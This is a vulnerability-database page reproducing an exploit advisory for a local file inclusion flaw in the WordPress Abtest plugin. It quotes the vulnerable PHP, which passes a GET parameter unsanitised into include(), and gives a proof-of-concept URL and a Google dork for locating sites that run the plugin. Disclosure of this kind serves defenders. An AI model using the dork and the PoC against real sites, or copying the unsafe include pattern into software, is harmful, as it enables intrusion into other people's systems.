Lucene search
K

WordPress Abtest Local File Inclusion

🗓️ 21 Mar 2016 00:00:00Reported by CrashBandicotType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

WordPress Abtest Local File Inclusion. Exploit in abtest_admin.ph

Code
`# Exploit Title: Wordpress Plugin Abtest - Local File Inclusion  
# Date: 2016-03-19  
# Google Dork : inurl:/wp-content/plugins/abtest/  
# Exploit Author: CrashBandicot  
# Vendor Homepage: https://github.com/wp-plugins/abtest  
# Tested on: Chrome  
  
  
# Vulnerable File : abtest_admin.php  
  
<?php   
  
require 'admin/functions.php';   
  
if (isset($_GET['action'])) {  
  
include 'admin/' . $_GET['action'] . '.php';  
  
} else {  
  
include 'admin/list_experiments.php';   
}  
?>  
  
# PoC : localhost/wp-content/plugins/abtest/abtest_admin.php?action=[LFI]  
  
# Pics : http://i.imgur.com/jZFKYOc.png  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Mar 2016 00:00Current
7.4High risk
Vulners AI Score7.4
19